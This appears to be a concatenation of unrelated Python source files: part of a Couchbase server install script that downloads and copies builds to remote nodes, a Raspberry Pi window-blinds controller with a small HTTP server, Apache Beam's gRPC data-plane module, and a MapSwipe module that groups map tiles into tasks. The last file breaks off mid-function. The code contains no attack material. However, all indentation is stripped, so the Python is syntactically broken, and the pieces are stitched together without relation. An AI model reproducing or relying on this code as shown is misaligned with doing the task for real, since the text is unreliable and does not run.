def hdiutil_attach(shell, dmg_path):
volumes = _get_mounted_volumes(shell)
for volume in volumes:
shell.execute_command("hdiutil detach " + '"' + "/tmp/" + volume + '"')
shell.execute_command("umount " + '"' + "/tmp/" + volume + '"')
shell.execute_command("hdiutil attach {0} -mountpoint /tmp/{1}".
format(dmg_path, "couchbase-server-" + params["version"]))
return shell.file_exists("/tmp/", "couchbase-server-" + params["version"])
def get_node_helper(ip):
for node_helper in NodeHelpers:
if node_helper.ip == ip:
return node_helper
return None
def print_result_and_exit(err=None, install_started=True):
if err:
log.error(err)
success = []
fail = []
install_not_started = []
for server in params["servers"]:
node = get_node_helper(server.ip)
if not node or not node.install_success:
if install_started:
fail.append(server.ip)
else:
install_not_started.append(server.ip)
elif node.install_success:
success.append(server.ip)
log.info("-" * 100)
for _ in install_not_started:
log.error("INSTALL NOT STARTED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in fail:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in success:
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
if len(fail) > 0 or len(install_not_started) > 0:
sys.exit(1)
def process_user_input():
params = _parse_user_input()
_params_validation()
return params
def _parse_user_input():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p:', [])
for o, a in opts:
if o == "-h":
print_result_and_exit(install_constants.USAGE)
if len(sys.argv) <= 1:
print_result_and_exit(install_constants.USAGE)
userinput = TestInput.TestInputParser.get_test_input(sys.argv)
except IndexError:
print_result_and_exit(install_constants.USAGE)
except getopt.GetoptError as err:
print_result_and_exit(str(err))
# Mandatory params
if not userinput.servers:
print_result_and_exit("No servers specified. Please use the -i parameter." + "\n" + install_constants.USAGE)
else:
params["servers"] = userinput.servers
# Validate and extract remaining params
for key, value in list(userinput.test_params.items()):
if key == "debug_logs":
params["debug_logs"] = True if value.lower() == "true" else False
if key == "install_tasks":
tasks = []
for task in value.split('-'):
if task in install_constants.DEFAULT_INSTALL_TASKS and task not in tasks:
tasks.append(task)
if len(tasks) > 0:
params["install_tasks"] = tasks
log.info("INSTALL TASKS: {0}".format(params["install_tasks"]))
if "install" not in params["install_tasks"] and "init" not in params["install_tasks"]:
return params # No other parameters needed
if key == 'v' or key == "version":
if re.match('^[0-9\.\-]*$', value) and len(value) > 5:
params["version"] = value
if key == "url":
if value.startswith("http"):
params["url"] = value
else:
log.warning('URL:{0} is not valid, will use version to locate build'.format(value))
if key == "type" or key == "edition":
if "community" in value.lower():
params["cb_edition"] = install_constants.CB_COMMUNITY
if key == "timeout" and int(value) > 60:
params["timeout"] = int(value)
if key == "storage_mode":
params["storage_mode"] = value
if key == "disable_consistency":
params["disable_consistency"] = True if value.lower() == "true" else False
if key == "skip_local_download":
params["skip_local_download"] = False if value.lower() == "false" else True
if key == "enable_ipv6":
if value.lower() == "true":
for server in params["servers"]:
if re.match('\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', server.ip):
print_result_and_exit(
"Cannot enable IPv6 on an IPv4 machine: {0}. Please run without enable_ipv6=True.".format(
server.ip))
params["enable_ipv6"] = True
if key == "fts_quota" and int(value) >= 256:
params["fts_quota"] = int(value)
if key == "fts_query_limit" and int(value) > 0:
params["fts_query_limit"] = int(value)
if key == "variant":
params["variant"] = value
if not params["version"] and not params["url"]:
print_result_and_exit("Need valid build version or url to proceed")
return params
def __check_servers_reachable():
reachable = []
unreachable = []
for server in params["servers"]:
try:
RemoteMachineShellConnection(server, exit_on_failure=False)
reachable.append(server.ip)
except Exception as e:
log.error(e)
unreachable.append(server.ip)
if len(unreachable) > 0:
log.info("-" * 100)
for _ in unreachable:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in reachable:
# Marking this node as "completed" so it is not moved to failedInstall state
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
sys.exit(1)
def _params_validation():
__check_servers_reachable()
# Create 1 NodeHelper instance per VM
for server in params["servers"]:
NodeHelpers.append(NodeHelper(server))
# Version compatibility
node_os = []
for node in NodeHelpers:
if node.get_os() not in install_constants.SUPPORTED_OS:
print_result_and_exit("Install on {0} OS is not supported".format(node.get_os()))
else:
node_os.append(node.get_os())
if len(set(node_os)) == 1:
params["all_nodes_same_os"] = True
_check_version_compatibility(NodeHelpers[0])
else:
for node in NodeHelpers:
_check_version_compatibility(node)
# TODO: check if cb version is compatible with os
def _check_version_compatibility(node):
pass
def pre_install_steps():
if "install" in params["install_tasks"]:
if params["url"] is not None:
if NodeHelpers[0].shell.is_url_live(params["url"]):
params["all_nodes_same_os"] = True
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = params["url"]
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
else:
print_result_and_exit("URL {0} is not live. Exiting.".format(params["url"]))
else:
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = __get_build_url(node, build_binary)
if not build_url:
print_result_and_exit(
"Build is not present in latestbuilds or release repos, please check {0}".format(build_binary))
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
_download_build()
def _execute_local(command, timeout):
# -- Uncomment the below 2 lines for python 3
# process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait(timeout)
# process.communicate()[0].strip()
# -- python 2
returncode = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait()
return returncode
def __copy_thread(src_path, dest_path, node):
logging.info("Copying %s to %s" % (src_path, node.ip))
node.shell.copy_file_local_to_remote(src_path, dest_path)
logging.info("Done copying build to %s.", node.ip)
def _copy_to_nodes(src_path, dest_path):
copy_threads = []
for node in NodeHelpers:
copy_to_node = threading.Thread(target=__copy_thread, args=(src_path, dest_path, node))
copy_threads.append(copy_to_node)
copy_to_node.start()
for thread in copy_threads:
thread.join()
def __get_build_url(node, build_binary):
if params["enable_ipv6"]:
ipv6_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_FQDN_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(ipv6_url, exit_if_not_live=False):
return ipv6_url
else:
latestbuilds_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
release_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_RELEASE_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(latestbuilds_url, exit_if_not_live=False):
return latestbuilds_url
elif node.shell.is_url_live(release_url, exit_if_not_live=False):
return release_url
return None
def _download_build():
if params["all_nodes_same_os"] and not params["skip_local_download"]:
check_and_retry_download_binary_local(NodeHelpers[0])
_copy_to_nodes(NodeHelpers[0].build.path, NodeHelpers[0].build.path)
for node in NodeHelpers:
if not check_file_exists(node, node.build.path) or not check_file_size(node):
print_result_and_exit("Unable to copy build to {}, exiting".format(node.build.path), install_started=False)
else:
for node in NodeHelpers:
build_url = node.build.url
filepath = node.build.path
cmd = install_constants.DOWNLOAD_CMD[node.info.deliverable_type]
if "curl" in cmd:
cmd = cmd.format(build_url, filepath,
install_constants.WAIT_TIMES[node.info.deliverable_type]
["download_binary"])
elif "wget" in cmd:
cmd = cmd.format(__get_download_dir(node), build_url)
logging.info("Downloading build binary to {0}:{1}..".format(node.ip, filepath))
check_and_retry_download_binary(cmd, node)
log.debug("Done downloading build binary")
def check_and_retry_download_binary_local(node):
log.info("Downloading build binary to {0}..".format(node.build.path))
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type][
"download_binary"]
cmd = install_constants.WGET_CMD.format(__get_download_dir(node), node.build.url)
start_time = time.time()
while time.time() < start_time + timeout:
try:
exit_code = _execute_local(cmd, timeout)
if exit_code == 0 and os.path.exists(node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warn("Unable to download build: {0}, retrying..".format(e.message))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout,
node.build.path), install_started=False)
def check_file_exists(node, filepath):
output, _ = node.shell.execute_command("ls -lh {0}".format(filepath), debug=params["debug_logs"])
for line in output:
if line.find('No such file or directory') == -1:
return True
return False
def get_remote_build_size(node):
output, _ = node.shell.execute_command(install_constants.REMOTE_BUILD_SIZE_CMD.format(node.build.url))
remote_build_size = int(output[0].strip().split(" ")[1])
return remote_build_size
def get_local_build_size(node):
output, _ = node.shell.execute_command(install_constants.LOCAL_BUILD_SIZE_CMD.format(__get_download_dir(node), __get_build_binary_name(node)))
local_build_size = int(output[0].strip().split(" ")[0])
return local_build_size
def check_file_size(node):
try:
expected_size = get_remote_build_size(node)
actual_size = get_local_build_size(node)
return expected_size == actual_size
except Exception:
return False
def check_and_retry_download_binary(cmd, node):
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type]["download_binary"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
_, _, download_exit_code = node.shell.execute_command(cmd, debug=params["debug_logs"], get_exit_code=True)
if download_exit_code == 0 and check_file_size(node) and check_file_exists(node, node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warning("Unable to download build: {0}, retrying..".format(e))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout, node.ip), install_started=False)
def __get_download_dir(node):
os = node.get_os()
if os in install_constants.LINUX_DISTROS:
if node.shell.nonroot:
return install_constants.NON_ROOT_DOWNLOAD_DIR['LINUX_DISTROS']
else:
return install_constants.DOWNLOAD_DIR["LINUX_DISTROS"]
elif os in install_constants.MACOS_VERSIONS:
return install_constants.DOWNLOAD_DIR["MACOS_VERSIONS"]
elif os in install_constants.WINDOWS_SERVER:
return install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"]
def __get_build_binary_name(node):
# couchbase-server-enterprise-6.5.0-4557-centos7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-suse15.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-rhel8.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-oel7.x86_64.rpm
# couchbase-server-enterprise-6.5.0-4557-amzn2.x86_64.rpm
if node.get_os() in install_constants.X86:
return "{0}-{1}-{2}{3}.{4}.{5}".format(params["cb_edition"],
params["version"],
node.get_os(),
"-" + params["variant"] if "variant" in params else "",
node.info.architecture_type,
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-ubuntu16.04_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-debian8_amd64.deb
# couchbase-server-enterprise_6.5.0-4557-windows_amd64.msi
elif node.get_os() in install_constants.AMD64:
if "windows" in node.get_os():
node.info.deliverable_type = "msi"
return "{0}_{1}-{2}_{3}.{4}".format(params["cb_edition"],
params["version"],
node.get_os(),
"amd64",
node.info.deliverable_type)
# couchbase-server-enterprise_6.5.0-4557-macos_x86_64.dmg
elif node.get_os() in install_constants.MACOS_VERSIONS:
return "{0}_{1}-{2}_{3}-{4}.{5}".format(params["cb_edition"],
params["version"],
"macos",
node.info.architecture_type,
"unnotarized",
node.info.deliverable_type)
|
blinds_control.py
|
# server stuff
# import simple_server as simpleSrvr
from simple_server import *
# motor control stuff
import motor_control as motorCtrl
# blossom control
import blossom_control as blossom
# blossom info
blossom_add = blossom.blossom_add
blossom_blinds = {'raise':'fear2','lower':'sad3','':'yes'}
# GPIO setup
import RPi.GPIO as GPIO
# GPIO 4 (pin 7) goes up
gpio_up = 4
# GPIO 3 (pin 5) goes down
gpio_down = 3
# GPIO 2 (pin 3) commands blossom
gpio_blossom = 2
GPIO.setmode(GPIO.BCM)
GPIO.setup(gpio_up,GPIO.IN)
GPIO.setup(gpio_down,GPIO.IN)
GPIO.setup(gpio_blossom,GPIO.IN)
import firebase_control
from firebase_control import fb as gal9000
# threading
import threading
import SimpleHTTPServer
import SocketServer
from BaseHTTPServer import BaseHTTPRequestHandler
from urlparse import urlparse
port = 8000
class funHandler(BaseHTTPRequestHandler):
# def do_GET(self, function, *args, **kwargs):
def do_GET(self):
print self.path
self.send_response(200)
move_blinds(self.path[1:])
# poll gal9000 firebase
def gal9000_thread():
while(1):
try:
#print str(GPIO.input(gpio_up))+str(GPIO.input(gpio_down))+str(GPIO.input(gpio_blossom))
if (GPIO.input(gpio_up)):
print 'Raising'
move_blinds('raise')
elif (GPIO.input(gpio_down)):
print 'Lowering'
move_blinds('lower')
elif (GPIO.input(gpio_blossom)):
print 'Blossoming'
blossom.cmd_blossom('yes','calm')
except KeyboardInterrupt:
return
# poll blind position
def blind_pos_thread():
while(1):
try:
motor_load = motorCtrl.get_load(1)
print motor_load
blind_state = ''
if (motor_load == 96.5):
blind_state = 'up'
elif(motor_load == -96.5):
blind_state = 'down'
if (blind_state != ''):
gal9000.put('blinds','state',blind_state)
print blind_state
except KeyboardInterrupt:
return
# check and update from firebase
def gal9000_check():
blinds_cmd = gal9000.get('blinds','cmd')
blinds_state = gal9000.get('blinds','state')
blossom_s = gal9000.get('blossom','s')
blossom_idle = gal9000.get('blossom','idle')
# command blossom
blossom.cmd_blossom(blossom_s, blossom_idle)
# move blinds
move_blinds(blinds_cmd)
# erase commands
gal9000.put('blinds','cmd','')
return blinds_state
# move blinds
def move_blinds(cmd):
blossom.cmd_blossom(blossom_blinds[cmd])
blinds_state = ''
if (cmd == 'raise'):
motorCtrl.move_to_limit(1,-1000)
blinds_state = 'up'
# gal9000_put('up')
elif (cmd =='lower'):
motorCtrl.move_to_limit(1,1000)
blinds_state = 'down'
# gal9000_put('down')
elif (cmd == 'stop'):
motorCtrl.move_to_limit(1,0)
return
else:
return
gal9000.put('blinds','state',blinds_state)
# main
if __name__ == "__main__":
try:
# set function handler for http requests
motorHandler = funHandler
# init blinds state
# blinds_state = gal9000_check()
# start threading
t = threading.Thread(target=gal9000_thread)
t.start()
# c = threading.Thread(target=blind_pos_thread)
# c.start()
# start server
httpd = SocketServer.TCPServer(("", port), motorHandler)
httpd.serve_forever()
# catch ctrl-c
except KeyboardInterrupt:
httpd.shutdown()
pass
|
data_plane.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of DataChannels for communicating across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import Queue as queue
import threading
import grpc
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
# This module is experimental. No backwards-compatibility guarantees.
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self, close_callback=None):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
def close(self):
if self._close_callback:
self._close_callback(self.get())
class DataChannel(object):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(instruction_id, targets):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, target1)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def input_elements(self, instruction_id, expected_targets):
"""Returns an iterable of all Element.Data bundles for instruction_id.
This iterable terminates only once the full set of data has been recieved
for each of the expected targets. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_targets: which targets to wait on for completion
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, target):
"""Returns an output stream writing elements to target.
Args:
instruction_id: which instruction this stream belongs to
target: the target of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
If this channel is shared by many instructions, should only be called on
worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
The inverse() method returns the other side of a instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_targets=None):
for data in self._inputs:
if data.instruction_reference == instruction_id:
yield data
def output_stream(self, instruction_id, target):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
return ClosableOutputStream(add_to_inverse_output)
def close(self):
pass
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
def close(self):
self._to_send.put(self._WRITES_FINISHED)
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def input_elements(self, instruction_id, expected_targets):
received = self._receiving_queue(instruction_id)
done_targets = []
while len(done_targets) < len(expected_targets):
data = received.get()
if not data.data and data.target in expected_targets:
done_targets.append(data.target)
else:
assert data.target not in done_targets
yield data
def output_stream(self, instruction_id, target):
# TODO: Return an output stream that sends data
# to the Runner once a fixed size buffer is full.
# Currently we buffer all the data before sending
# any messages.
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=''))
return ClosableOutputStream(add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=broad-except
logging.exception('Failed to read inputs in the data plane')
raise
finally:
self._reads_finished.set()
def _start_reader(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self._start_reader(data_stub.Data(self._write_outputs()))
class GrpcServerDataChannel(
beam_fn_api_pb2.BeamFnDataServicer, _GrpcDataChannel):
"""A DataChannel wrapping the server side of a BeamFnData connection."""
def Data(self, elements_iterator, context):
self._start_reader(elements_iterator)
for elements in self._write_outputs():
yield elements
class DataChannelFactory(object):
"""An abstract factory for creating ``DataChannel``."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self):
self._data_channel_cache = {}
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
logging.info('Creating channel for %s', url)
grpc_channel = grpc.insecure_channel(
url,
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options=[("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)])
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
|
tasking_manager_geometries.py
|
import csv
from queue import Queue
import threading
from osgeo import ogr
from mapswipe_workers.definitions import logger
from mapswipe_workers.definitions import DATA_PATH
from mapswipe_workers.utils import tile_functions, geojson_functions
def load_data(project_id: str, csv_file: str) -> list:
"""
This will load the aggregated results csv file into a list of dictionaries.
For further steps we currently rely on task_x, task_y, task_z and yes_share and maybe_share and wkt
"""
project_data = []
with open(csv_file, "r") as f:
reader = csv.reader(f, delimiter=",")
for i, row in enumerate(reader):
if i == 0:
# skip header
continue
# the last row of the csv might contain a comment about data use
if row[0].startswith("#"):
continue
task_id = row[1]
task_x = int(task_id.split("-")[1])
task_y = int(task_id.split("-")[2])
task_z = int(task_id.split("-")[0])
# TODO: Add no_count here and use later
project_data.append(
{
"id": task_id,
"project_id": project_id,
"task_x": task_x,
"task_y": task_y,
"task_z": task_z,
"no_count": int(row[2]),
"yes_count": int(row[3]),
"maybe_count": int(row[4]),
"bad_imagery_count": int(row[5]),
"no_share": float(row[7]),
"yes_share": float(row[8]),
"maybe_share": float(row[9]),
"bad_imagery_share": float(row[10]),
"wkt": tile_functions.geometry_from_tile_coords(
task_x, task_y, task_z
),
}
)
return project_data
def yes_maybe_condition_true(x: dict) -> bool:
"""
The yes maybe condition is true if 35% or
2 (or more) out of 3 users
2 (or more) out of 4 users
2 (or more) out of 5 users
have classified as 'yes' or 'maybe'
"""
if x["yes_share"] + x["maybe_share"] > 0.35:
return True
else:
return False
def filter_data(project_data: list) -> list:
"""
Filter results that fulfil the yes_maybe_condition.
"""
# filter yes and maybe
filtered_project_data = [x for x in project_data if yes_maybe_condition_true(x)]
return filtered_project_data
def check_list_sum(x, range_val):
"""
This checks if a give tile belongs to the defined "star"-shaped neighbourhood
"""
item_sum = abs(x[0]) + abs(x[1])
if item_sum <= range_val:
return True
else:
return False
def get_neighbour_list(neighbourhood_shape: str, neighbourhood_size: int) -> list:
"""
Filters tiles that are neighbours.
This is based on a given search radius (neighbourhood size) and search window shape (neighbourhood shape=.
"""
neighbour_list = []
range_val = int(neighbourhood_size / 2)
for i in range(-range_val, range_val + 1):
for j in range(-range_val, range_val + 1):
if i == 0 and j == 0:
pass
else:
neighbour_list.append([i, j])
if neighbourhood_shape == "star":
neighbour_list = [x for x in neighbour_list if check_list_sum(x, range_val)]
return neighbour_list
def add_group_id_to_neighbours(task_x: int, task_y: int, task_z: int, group_id: int):
"""
Add a group id to all other tiles that are in the neighbourhood of the given tile,
which is defined by task_x, task_y and task_z.
"""
# look for neighbours
for i, j in neighbour_list:
new_task_x = int(task_x) + i
new_task_y = int(task_y) + j
new_task_id = f"{task_z}-{new_task_x}-{new_task_y}"
if new_task_id in yes_results_dict:
yes_results_dict[new_task_id]["my_group_id"] = group_id
def create_duplicates_dict() -> dict:
"""
Check which tasks belong to multiple groups.
This will be used as a later stage to put tasks into distinct groups.
"""
duplicated_groups = {}
for task_id in yes_results_dict.keys():
my_group_id = yes_results_dict[task_id]["my_group_id"]
# check for other results in the neighbourhood
# look for neighbours
for i, j in neighbour_list:
new_task_x = int(yes_results_dict[task_id]["task_x"]) + i
new_task_y = int(yes_results_dict[task_id]["task_y"]) + j
new_task_id = (
f"{yes_results_dict[task_id]['task_z']}-{new_task_x}-{new_task_y}"
)
if new_task_id in yes_results_dict:
neighbours_group_id = yes_results_dict[new_task_id]["my_group_id"]
if neighbours_group_id != my_group_id:
# add the other group to duplicated groups dict
try:
duplicated_groups[my_group_id].add(neighbours_group_id)
except KeyError:
duplicated_groups[my_group_id] = set([neighbours_group_id])
# add my_group_id to other groupd_id in duplicated dict
try:
duplicated_groups[neighbours_group_id].add(my_group_id)
except KeyError:
duplicated_groups[neighbours_group_id] = set([my_group_id])
return duplicated_groups
def remove_duplicates(duplicated_groups: dict):
"""
Remove groups ids for tasks which have more than one.
This is to make sure that every task belongs to a single group only.
This distinct group id will be the basis for further geometric processing.
"""
for duplicated_group_id in sorted(duplicated_groups.keys(), reverse=True):
logger.debug(
f"{duplicated_group_id}: {list(duplicated_groups[duplicated_group_id])}"
)
my_duplicated_group_id = duplicated_group_id
for other_group_id in duplicated_groups[duplicated_group_id]:
if other_group_id < my_duplicated_group_id:
my_duplicated_group_id = other_group_id
for task_id in yes_results_dict.keys():
if yes_results_dict[task_id]["my_group_id"] == duplicated_group_id:
yes_results_dict[task_id]["my_group_id"] = my_duplicated_group_id
def split_groups(q):
"""
This function will be executed using threading.
First it checks if there are still processes pending in the queue.
We are using a clustering algorithm to put tasks together in groups.
Since it is computationally expensive to check which tiles are neighbours,
we split our results into chunks (called groups here).
When we reach a group size below the defined group size we will stop.
Otherwise, the group will be split into two parts and
both will be added as new groups to our queue.
"""
while not q.empty():
group_id, group_data, group_size = q.get()
logger.debug(f"the group ({group_id}) has {len(group_data)} members")
# find min x, and min y
x_list = []
y_list = []
for result, data in group_data.items():
x_list.append(int(data["task_x"]))
y_list.append(int(data["task_y"]))
min_x = min(x_list)
max_x = max(x_list)
x_width = max_x - min_x
min_y = min(y_list)
max_y = max(y_list)
y_width = max_y - min_y
new_grouped_data = {"a": {}, "b": {}}
if x_width >= y_width:
# first split vertically
for result, data in group_data.items():
# result is in first segment
if int(data["task_x"]) < (min_x + (x_width / 2)):
new_grouped_data["a"][result] = data
else:
new_grouped_data["b"][result] = data
else:
# first split horizontally
for result, data in group_data.items():
# result is in first segment
if int(data["task_y"]) < (min_y + (y_width / 2)):
new_grouped_data["a"][result] = data
else:
new_grouped_data["b"][result] = data
for k in ["a", "b"]:
logger.debug("there are %s results in %s" % (len(new_grouped_data[k]), k))
for result, data in new_grouped_data[k].items():
x_list.append(int(data["task_x"]))
y_list.append(int(data["task_y"]))
min_x = min(x_list)
max_x = max(x_list)
x_width = max_x - min_x
min_y = min(y_list)
max_y = max(y_list)
y_width = max_y - min_y
if len(new_grouped_data[k]) < group_size:
# add this check to avoid large groups groups with few items
if x_width * y_width > 2 * (
my_neighbourhood_size * my_neighbourhood_size
):
q.put([group_id, new_grouped_data[k], group_size])
else:
split_groups_list.append(new_grouped_data[k])
logger.debug('add "a" to split_groups_dict')
else:
# add this group to a queue
q.put([group_id, new_grouped_data[k], group_size])
q.task_done()
def create_hot_tm_tasks(
project_id: str,
project_data: list,
group_size: int = 15,
neighbourhood_shape: str = "rectangle",
neighbourhood_size: int = 5,
) -> dict:
"""
This functions creates a dictionary of tiles which will be forming a task in the HOT Tasking Manager.
It will create a neighbourhood list, which will function as a mask to filter tiles that are close to each other.
The functions assigns group ids to each tile.
For tiles that got several group ids, this will be resolved in the next step.
Once each task has a unique group id, the function checks the size (number of tiles) for each group.
Groups that hold too many tiles (too big to map in the Tasking Manager) will be split into smaller groups.
Finally, a dictionary is returned which holds each group as an item.
Each group consists of a limited number of tiles.
"""
# final groups dict will store the groups that are exported
final_groups_dict = {}
highest_group_id = 0
# create a dictionary with all results
global yes_results_dict
yes_results_dict = {}
for result in project_data:
yes_results_dict[result["id"]] = result
logger.info(
"created results dictionary. there are %s results." % len(yes_results_dict)
)
if len(yes_results_dict) < 1:
return final_groups_dict
global neighbour_list
global my_neighbourhood_size
my_neighbourhood_size = neighbourhood_size
neighbour_list = get_neighbour_list(neighbourhood_shape, neighbourhood_size)
logger.info(
"got neighbour list. neighbourhood_shape: %s, neighbourhood_size: %s"
% (neighbourhood_shape, neighbourhood_size)
)
global split_groups_list
split_groups_list = []
# test for neighbors and set groups id
for task_id in sorted(yes_results_dict.keys()):
try:
# this task has already a group id, great.
group_id = yes_results_dict[task_id]["my_group_id"]
except KeyError:
group_id = highest_group_id + 1
highest_group_id += 1
yes_results_dict[task_id]["my_group_id"] = group_id
logger.debug("created new group id")
logger.debug("group id: %s" % group_id)
# check for other results in the neighbourhood and add the group id to them
add_group_id_to_neighbours(
yes_results_dict[task_id]["task_x"],
yes_results_dict[task_id]["task_y"],
yes_results_dict[task_id]["task_z"],
group_id,
)
logger.info("added group ids to yes maybe results dict")
# check if some tasks have different groups from their neighbours
duplicates_dict = create_duplicates_dict()
while len(duplicates_dict) > 0:
remove_duplicates(duplicates_dict)
duplicates_dict = create_duplicates_dict()
logger.debug("there are %s duplicated groups" % len(duplicates_dict))
logger.info("removed all duplicated group ids in yes maybe results dict")
grouped_results_dict = {}
for task_id in yes_results_dict.keys():
group_id = yes_results_dict[task_id]["my_group_id"]
try:
grouped_results_dict[group_id][task_id] = yes_results_dict[task_id]
except KeyError:
grouped_results_dict[group_id] = {}
grouped_results_dict[group_id][task_id] = yes_results_dict[task_id]
logger.info("created dict item for each group")
# reset highest group id since we merged several groups
highest_group_id = max(grouped_results_dict)
logger.debug("new highest group id: %s" % highest_group_id)
q = Queue(maxsize=0)
num_threads = 1
for group_id in grouped_results_dict.keys():
if len(grouped_results_dict[group_id]) < group_size:
final_groups_dict[group_id] = grouped_results_dict[group_id]
else:
group_data = grouped_results_dict[group_id]
# add this group to the queue
q.put([group_id, group_data, group_size])
logger.info("added groups to queue.")
for i in range(num_threads):
